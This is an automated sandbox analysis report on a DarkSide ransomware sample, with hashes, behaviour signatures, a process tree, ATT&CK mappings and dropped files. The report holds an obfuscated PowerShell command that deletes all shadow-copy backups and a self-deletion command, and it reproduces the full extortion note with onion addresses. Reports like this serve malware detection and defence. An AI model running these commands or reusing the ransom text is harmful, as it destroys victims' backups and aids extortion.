Resubmissions

02-06-2023 10:03

230602-l3vmgaah67 10

02-06-2023 10:03

230602-l3hb5sah65 3

02-06-2023 09:55

230602-lxwbtaah45 3

Analysis

  • max time kernel
    156s
  • max time network
    235s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    02-06-2023 10:03

Errors

Reason
Machine shutdown

General

  • Target

    Darkside.exe

  • Size

    59KB

  • MD5

    cfcfb68901ffe513e9f0d76b17d02f96

  • SHA1

    766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f

  • SHA256

    17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61

  • SHA512

    0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c

  • SSDEEP

    768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Malware Config

Extracted

Path

C:\Users\Admin\README.6a2c0f68.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (182) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Modifies extensions of user files 16 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 6 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Darkside.exe
    "C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1724
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
      2⤵
      • Deletes itself
      PID:3516
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2036
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\SuspendOut.xps.6a2c0f68
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\SuspendOut.xps.6a2c0f68"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:3252
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.6a2c0f68.TXT
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:3572
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3616
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d59758,0x7fef6d59768,0x7fef6d59778
      2⤵
        PID:3628
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1240 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:2
        2⤵
          PID:3844
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
          2⤵
            PID:3864
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1656 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
            2⤵
              PID:3888
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
              2⤵
                PID:3140
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2208 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
                2⤵
                  PID:3148
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:2
                  2⤵
                    PID:204
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3696 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
                    2⤵
                      PID:2068
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3804 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
                      2⤵
                        PID:2096
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3920 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
                        2⤵
                          PID:2104
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3468 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
                          2⤵
                            PID:2800
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=580 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
                            2⤵
                              PID:2972
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2308 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
                              2⤵
                                PID:3412
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4172 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
                                2⤵
                                  PID:2420
                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                1⤵
                                  PID:3328
                                • C:\Windows\system32\LogonUI.exe
                                  "LogonUI.exe" /flags:0x0
                                  1⤵
                                    PID:1796
                                  • C:\Windows\system32\AUDIODG.EXE
                                    C:\Windows\system32\AUDIODG.EXE 0x520
                                    1⤵
                                      PID:836
                                    • C:\Windows\system32\LogonUI.exe
                                      "LogonUI.exe" /flags:0x1
                                      1⤵
                                        PID:3288

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Defense Evasion

                                      Modify Registry

                                      2
                                      T1112

                                      Install Root Certificate

                                      1
                                      T1130

                                      Credential Access

                                      Credentials in Files

                                      1
                                      T1081

                                      Discovery

                                      System Information Discovery

                                      2
                                      T1082

                                      Query Registry

                                      1
                                      T1012

                                      Collection

                                      Data from Local System

                                      1
                                      T1005

                                      Impact

                                      Defacement

                                      1
                                      T1491

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        62KB

                                        MD5

                                        3ac860860707baaf32469fa7cc7c0192

                                        SHA1

                                        c33c2acdaba0e6fa41fd2f00f186804722477639

                                        SHA256

                                        d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

                                        SHA512

                                        d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        344B

                                        MD5

                                        5fc038ae0b46e2e0623cb8e064a6e198

                                        SHA1

                                        123192dbb89574e23af206ca440850ed790b3e28

                                        SHA256

                                        f453ccaf8a89bc64190e633e7c9204bea54fa9f6a99a7ec1d566aeea8e94689a

                                        SHA512

                                        1812d4fe467d32180c6e8abfce419b025f247cfa09f525108cadf344ae5dfd554c5c873d0926e0f36802e7a29ebbd09d04898a4bb5d4f743c43379a1a280de6a

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        344B

                                        MD5

                                        f55ab70e74e7e0bd9f6c85ed05a0e9e7

                                        SHA1

                                        19d95512147f5541ec93d1a97c1ebdc3c6ca736e

                                        SHA256

                                        8124f148bcc43b6f60b796bdd96d503ba989560750e47fdc43926a8951daa3b3

                                        SHA512

                                        24c21f958bd6c12a99cbac9aa2e63944a99ee3692d45fa1c2082c93138377e5c3a30caa6d1b8fb378fbd904609e94e8e2c2a18568f0673c3ec4d8494a9a08d49

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2881d971-4fec-4bfe-b097-a8c60dc0c387.tmp
                                        Filesize

                                        4KB

                                        MD5

                                        8e96efda541e1cddb0e882d03a9c51df

                                        SHA1

                                        f52f3e3e1e8c6f7c0a22b0a7d02354fb6fddb825

                                        SHA256

                                        1e18519a0507db0d080618361a857fcaa9002bf06ed15e854c5fe83c6625d7d5

                                        SHA512

                                        55e000eb824ecdb7a0321574eaba01a06de1dd79bddad1b0a3d798bc86108a3bb8c90605635197ccea768e38ab43b79e92fd8267722aa52594ed2dae38b40c33

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000002.dbtmp
                                        Filesize

                                        16B

                                        MD5

                                        206702161f94c5cd39fadd03f4014d98

                                        SHA1

                                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                        SHA256

                                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                        SHA512

                                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
                                        Filesize

                                        264KB

                                        MD5

                                        f50f89a0a91564d0b8a211f8921aa7de

                                        SHA1

                                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                                        SHA256

                                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                        SHA512

                                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT
                                        Filesize

                                        16B

                                        MD5

                                        46295cac801e5d4857d09837238a6394

                                        SHA1

                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                        SHA256

                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                        SHA512

                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                        Filesize

                                        361B

                                        MD5

                                        2d724c38206b62c151cecf6756e721bc

                                        SHA1

                                        0e849b0a81d079150ed1b088d01d7c98b77a6032

                                        SHA256

                                        a6666f111f6139b3e674385855a1a350bb432d1427cf31b2b5cc7dff0901e9e1

                                        SHA512

                                        ca1c1c5ce27e0891467bcc7e26bb9e9fa577d22559cc41fa1f649a60db2c3709d4e2d258c41152b9bbd87c595554b7fb9557ff4592f099b424d279adfc326adb

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                        Filesize

                                        525B

                                        MD5

                                        f9e9ea2ca50c3426010eadc30c0676d8

                                        SHA1

                                        443c41ce4d7847ad8329ad852060e6e23360501d

                                        SHA256

                                        a51f5011e8da721fbc13cc7ad830d157f5eaa0ac3abf0bfecd5a3a179c6444b7

                                        SHA512

                                        34a0e538c980833409b11c01e88958d5faa190d4b1344693e719523b032a042f9d10eb759dcb439ba401676cdc391d6c552e5696f254c514d493aebddd0ca412

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                        Filesize

                                        5KB

                                        MD5

                                        3ffa392a02061391ade4f051cfa3fdf0

                                        SHA1

                                        f70fc1e9aafe60869ad3cc0ff6a1db71ff598644

                                        SHA256

                                        8ef6e20764217c6ca68e41b3ae81729e15d6d682b27efb949f94c8f83c6bee46

                                        SHA512

                                        4f4924942b168962586d2962dec0bdfd5a36858a5d115c1be7fa1605a27794572b2985d40446e3f3117183e342bb3d2f2432670508afdd189f381f80609076c2

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000004.dbtmp
                                        Filesize

                                        16B

                                        MD5

                                        6752a1d65b201c13b62ea44016eb221f

                                        SHA1

                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                        SHA256

                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                        SHA512

                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\cfa6340d-3445-4b86-9a60-405e55fe0171.tmp
                                        Filesize

                                        4KB

                                        MD5

                                        50e75c6face6d5eda07b4709838e16d4

                                        SHA1

                                        f6fb63c30572697a7c84d514ce2d83370dd7fa7e

                                        SHA256

                                        259e0edfb6e7f97a38793cb8584ee633304d2851f835a41aa7313d42cd73f5f0

                                        SHA512

                                        1fe062d57df766f975d48ce9d8475b12fee5b9b5e1fc2018af6396897674b3c504c125abda77f2443e07dca4006f90cd4a4163dcfe93dba065a291c682241fbe

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                        Filesize

                                        158KB

                                        MD5

                                        32008345b1bda97f725ec4d62760b0c2

                                        SHA1

                                        92e1e5116fd29d7b1ce8844ca9522fbf79e7f4d1

                                        SHA256

                                        7e75c015183b868508c73eb025aed1d0fe29dd3c522db031cea004f540f71d37

                                        SHA512

                                        8cd1850354a1476e2256e4a7ebeb87e2d66a925ee3022a98e8b91bc7ff7dd942d9d4a54659cf9d072b6b70c29a2614d6cc29d305aead0e3ee44d0f0cf726bc86

                                      • C:\Users\Admin\AppData\Local\Temp\Cab45AB.tmp
                                        Filesize

                                        61KB

                                        MD5

                                        fc4666cbca561e864e7fdf883a9e6661

                                        SHA1

                                        2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

                                        SHA256

                                        10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

                                        SHA512

                                        c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

                                      • C:\Users\Admin\AppData\Local\Temp\Tar4709.tmp
                                        Filesize

                                        164KB

                                        MD5

                                        4ff65ad929cd9a367680e0e5b1c08166

                                        SHA1

                                        c0af0d4396bd1f15c45f39d3b849ba444233b3a2

                                        SHA256

                                        c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

                                        SHA512

                                        f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                        Filesize

                                        7KB

                                        MD5

                                        590a97f8fe343f2395257a87797b084a

                                        SHA1

                                        5beafe0c41811236d98fe596d5074afa4c4ff958

                                        SHA256

                                        c04c64a686640a00a04083d8e7ee55da8ed613e63b4d0211ac4e57562a944284

                                        SHA512

                                        935407dc2348921e983bd1dcdfd60b5e34f98b179c4f894a83f663e1fe3b9f29e57153f1bfd954e31ed5ea64ab9ce93dec75cee215e2dbb723fcdc980f355875

                                      • C:\Users\Admin\Desktop\README.6a2c0f68.TXT
                                        Filesize

                                        3KB

                                        MD5

                                        b58e2411168bbdbec635cf4001635db0

                                        SHA1

                                        c130cd9caaaa514a6b98c1168e10d44a989d191a

                                        SHA256

                                        652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

                                        SHA512

                                        87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

                                      • C:\Users\Admin\Desktop\SuspendOut.xps.6a2c0f68
                                        Filesize

                                        627KB

                                        MD5

                                        3ecfc2a20e61926aaa26bab53316b80a

                                        SHA1

                                        def04eed400904d8080d5946c50408673f98e049

                                        SHA256

                                        4145a60c2aab5a61c5b9de030f5d7e67df3c079175335676bde4c7b904378c3e

                                        SHA512

                                        c24d4f2585e45a37df61fb8f7a06a4809cc533fd2eedbc7b51adb4a09ef213ae8f3143bc8d3cec73f44e55d774e2d6a50aa627e15e7c50ac4dafa12bf79f32fa

                                      • C:\Users\Admin\README.6a2c0f68.TXT
                                        Filesize

                                        3KB

                                        MD5

                                        b58e2411168bbdbec635cf4001635db0

                                        SHA1

                                        c130cd9caaaa514a6b98c1168e10d44a989d191a

                                        SHA256

                                        652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

                                        SHA512

                                        87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

                                      • \??\PIPE\samr
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                      • \??\pipe\crashpad_3616_GSKUGKEJNGZXFIWZ
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                      • memory/1724-144-0x00000000025E0000-0x0000000002660000-memory.dmp
                                        Filesize

                                        512KB

                                      • memory/1724-142-0x00000000025E0000-0x0000000002660000-memory.dmp
                                        Filesize

                                        512KB

                                      • memory/1724-143-0x00000000025E0000-0x0000000002660000-memory.dmp
                                        Filesize

                                        512KB

                                      • memory/1724-141-0x00000000025E0000-0x0000000002660000-memory.dmp
                                        Filesize

                                        512KB

                                      • memory/1724-140-0x0000000002360000-0x0000000002368000-memory.dmp
                                        Filesize

                                        32KB

                                      • memory/1724-139-0x000000001B180000-0x000000001B462000-memory.dmp
                                        Filesize

                                        2.9MB

                                      • memory/1796-669-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                        Filesize

                                        4KB

                                      • memory/3288-670-0x0000000002820000-0x0000000002821000-memory.dmp
                                        Filesize

                                        4KB